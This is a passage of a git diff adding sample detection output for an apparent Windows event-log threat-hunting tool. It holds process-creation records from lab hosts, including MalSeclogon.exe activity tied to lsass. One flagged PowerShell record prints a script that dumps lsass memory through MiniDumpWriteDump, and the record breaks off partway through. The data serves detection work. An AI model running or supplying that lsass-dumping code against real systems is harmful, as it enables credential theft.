WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18208 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x8dc + C:\Windows\System32\conhost.exe + %%1936 + 0x188 + + +" +2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18207 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xc74 + C:\Windows\System32\cmd.exe + %%1936 + 0x4f0 + + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18205 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x5b0 + C:\Windows\System32\wusa.exe + %%1937 + 0x4f0 + + +" +2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18204 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x27c + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18201 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xec8 + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18198 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x7f0 + C:\Windows\System32\consent.exe + %%1936 + 0x3c8 + + +" +2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18197 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x628 + C:\Windows\System32\wusa.exe + %%1938 + 0x4f0 + + +" +2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +" +2019-03-18T15:06:46.345209+04:00,1552907206.345209,4688,C:\Windows\System32\dllhost.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 433078 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xf6c + C:\Windows\System32\dllhost.exe + %%1936 + 0x278 + + +" +2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\conhost.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 432906 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x370 + C:\Windows\System32\conhost.exe + %%1936 + 0x764 + + +" +2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\cmd.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 432905 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x440 + C:\Windows\System32\cmd.exe + %%1936 + 0x448 + + +" +2019-03-19T02:16:09.458302+04:00,1552947369.458302,4688,C:\Windows\System32\calc.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 563299 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-20 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e4 + 0x424 + C:\Windows\System32\calc.exe + %%1936 + 0xae8 + + +" +2019-03-19T02:15:49.692401+04:00,1552947349.692401,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 563298 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xae8 + C:\Windows\System32\wbem\WmiPrvSE.exe + %%1936 + 0x248 + + +" +2019-03-19T04:02:07.445773+04:00,1552953727.445773,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566844 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0x3b4 + C:\Windows\System32\wbem\WmiPrvSE.exe + %%1936 + 0x248 + + +" +2019-03-19T04:02:04.367441+04:00,1552953724.367441,4688,C:\Windows\System32\tasklist.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566839 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0x970 + C:\Windows\System32\tasklist.exe + %%1936 + 0xbcc + + +" +2019-03-19T04:02:04.351252+04:00,1552953724.351252,4688,C:\Windows\System32\conhost.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566838 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xebc + C:\Windows\System32\conhost.exe + %%1936 + 0xbcc + + +" +2019-03-19T04:02:04.335561+04:00,1552953724.335561,4688,C:\Windows\System32\cmd.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566837 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xbcc + C:\Windows\System32\cmd.exe + %%1936 + 0x33c + + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18208 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x8dc + C:\Windows\System32\conhost.exe + %%1936 + 0x188 + + +" +2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18207 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xc74 + C:\Windows\System32\cmd.exe + %%1936 + 0x4f0 + + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18205 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x5b0 + C:\Windows\System32\wusa.exe + %%1937 + 0x4f0 + + +" +2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18204 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x27c + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18201 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xec8 + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18198 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x7f0 + C:\Windows\System32\consent.exe + %%1936 + 0x3c8 + + +" +2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18197 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x628 + C:\Windows\System32\wusa.exe + %%1938 + 0x4f0 + + +" +2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +" +2019-03-18T15:27:05.455663+04:00,1552908425.455663,4688,C:\Windows\System32\wbem\WMIC.exe,user01,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 433308 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + 0x44c + C:\Windows\System32\wbem\WMIC.exe + %%1936 + 0x86c + + +" +2019-02-13T22:05:06.665634+04:00,1550081106.665634,4688,C:\Windows\System32\AtBroker.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227784 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x7f0 + C:\Windows\System32\AtBroker.exe + %%1936 + 0xdec + + +" +2019-02-13T22:05:06.585519+04:00,1550081106.585519,4688,C:\Windows\System32\rdpclip.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227783 + + + + + Security + PC01.example.corp + + + + + S-1-5-20 + PC01$ + EXAMPLE + 0x3e4 + 0xa1c + C:\Windows\System32\rdpclip.exe + %%1936 + 0x500 + + +" +2019-02-13T22:05:05.453892+04:00,1550081105.453892,4688,C:\Windows\System32\TSTheme.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227776 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x9fc + C:\Windows\System32\TSTheme.exe + %%1936 + 0x278 + + +" +2019-02-13T22:05:05.253604+04:00,1550081105.253604,4688,C:\Windows\System32\LogonUI.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227775 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xce0 + C:\Windows\System32\LogonUI.exe + %%1936 + 0x768 + + +" +2019-02-13T22:05:05.123416+04:00,1550081105.123416,4688,C:\Windows\System32\winlogon.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227774 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x768 + C:\Windows\System32\winlogon.exe + %%1936 + 0x62c + + +" +2019-02-13T22:05:04.873056+04:00,1550081104.873056,4688,C:\Windows\System32\csrss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227773 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xadc + C:\Windows\System32\csrss.exe + %%1936 + 0x62c + + +" +2019-02-13T22:05:04.802956+04:00,1550081104.802956,4688,C:\Windows\System32\smss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227772 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x62c + C:\Windows\System32\smss.exe + %%1936 + 0x124 + + +" +2019-02-13T22:05:01.037541+04:00,1550081101.037541,4688,C:\Windows\System32\rundll32.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227769 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x410 + C:\Windows\System32\rundll32.exe + %%1936 + 0x278 + + +" +2019-02-13T22:04:57.862976+04:00,1550081097.862976,4688,C:\Windows\System32\LogonUI.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227751 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xc70 + C:\Windows\System32\LogonUI.exe + %%1936 + 0x4b8 + + +" +2019-02-13T22:04:57.672703+04:00,1550081097.672703,4688,C:\Windows\System32\winlogon.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227750 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x4b8 + C:\Windows\System32\winlogon.exe + %%1936 + 0x38c + + +" +2019-02-13T22:04:57.542516+04:00,1550081097.542516,4688,C:\Windows\System32\csrss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227749 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x9d4 + C:\Windows\System32\csrss.exe + %%1936 + 0x38c + + +" +2019-02-13T22:04:57.462400+04:00,1550081097.4624,4688,C:\Windows\System32\smss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227748 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x38c + C:\Windows\System32\smss.exe + %%1936 + 0x124 + + +" +2019-02-13T22:04:01.632120+04:00,1550081041.63212,4688,C:\Windows\System32\UI0Detect.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227726 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x934 + C:\Windows\System32\UI0Detect.exe + %%1936 + 0x990 + + +" +2019-02-13T22:03:35.734882+04:00,1550081015.734882,4688,C:\Windows\System32\slui.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227721 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xa38 + C:\Windows\System32\slui.exe + %%1936 + 0x278 + + +" +2019-02-13T22:03:28.338519+04:00,1550081008.338519,4688,C:\Users\user01\Desktop\plink.exe,user01,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +" +2019-02-13T22:02:19.518362+04:00,1550080939.518362,4688,C:\Windows\System32\AtBroker.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227712 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x250 + C:\Windows\System32\AtBroker.exe + %%1936 + 0x1d0 + + +" +2019-02-13T22:01:47.602470+04:00,1550080907.60247,4688,C:\Windows\System32\TSTheme.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227695 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x1fc + C:\Windows\System32\TSTheme.exe + %%1936 + 0x278 + + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" diff --git a/source/samples/Sample_Report.xlsx b/source/samples/Sample_Report.xlsx new file mode 100644 index 0000000..59cb16f Binary files /dev/null and b/source/samples/Sample_Report.xlsx differ diff --git a/source/samples/Sample_TimeSketch.csv b/source/samples/Sample_TimeSketch.csv new file mode 100644 index 0000000..3d75da3 --- /dev/null +++ b/source/samples/Sample_TimeSketch.csv @@ -0,0 +1,41690 @@ +message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel +powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 971 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + function Memory($path) +{ + + + $Process = Get-Process lsass + $DumpFilePath = $path + + $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') + $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') + $Flags = [Reflection.BindingFlags] 'NonPublic, Static' + $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) + $MiniDumpWithFullMemory = [UInt32] 2 + + + # + $ProcessId = $Process.Id + $ProcessName = $Process.Name + $ProcessHandle = $Process.Handle + $ProcessFileName = "$($ProcessName).dmp" + + $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName + + $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) + + $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, + $ProcessId, + $FileStream.SafeFileHandle, + $MiniDumpWithFullMemory, + [IntPtr]::Zero, + [IntPtr]::Zero, + [IntPtr]::Zero)) + + $FileStream.Close() + + if (-not $Result) + { + $Exception = New-Object ComponentModel.Win32Exception + $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" + + # Remove any partially written dump files. For example, a partial dump will be written + # in the case when 32-bit 